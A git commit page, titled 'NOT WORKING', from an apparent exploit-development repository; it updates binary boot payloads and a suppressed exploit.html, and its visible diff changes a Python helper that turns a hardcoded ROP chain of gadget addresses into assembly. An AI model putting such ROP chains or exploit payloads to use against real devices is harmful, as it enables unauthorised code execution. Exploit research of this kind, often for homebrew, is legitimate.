Browse Source

NOT WORKING

Winbagility 1 year ago
parent
commit
e5f1d8658c
4 changed files with 9 additions and 3 deletions
  1. BIN
      payload/boot.elf
  2. BIN
      payload/boot_.elf
  3. 2
    2
      payload/exploit.html
  4. 7
    1
      ropChainToAsm.py

BIN
payload/boot.elf View File


BIN
payload/boot_.elf View File


+ 2
- 2
payload/exploit.html
File diff suppressed because it is too large
View File


+ 7
- 1
ropChainToAsm.py View File

@@ -10,7 +10,13 @@
10 10
 # ropchain_appendu32(0x01800000)
11 11
 # in ropchainBuilder.html
12 12
 ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
13
-ropChainAddresses = ['00000000', '00000001', '010204C8', '01023F88', '010240B0', '01035FC8', '010376C0', '0107DD70', '01080274', '01800000', 'FFFF2222', 'FFFF3333']
13
+
14
+#Generate a list of each value used in the ROP chain for optimization purposes
15
+#Cause no need to load the value in multiple times
16
+ropChainAddresses = []
17
+for i in ropChain:
18
+    if not i in ropChainAddresses:
19
+        ropChainAddresses.append(i)
14 20
 
15 21
 # Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
16 22
 # then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size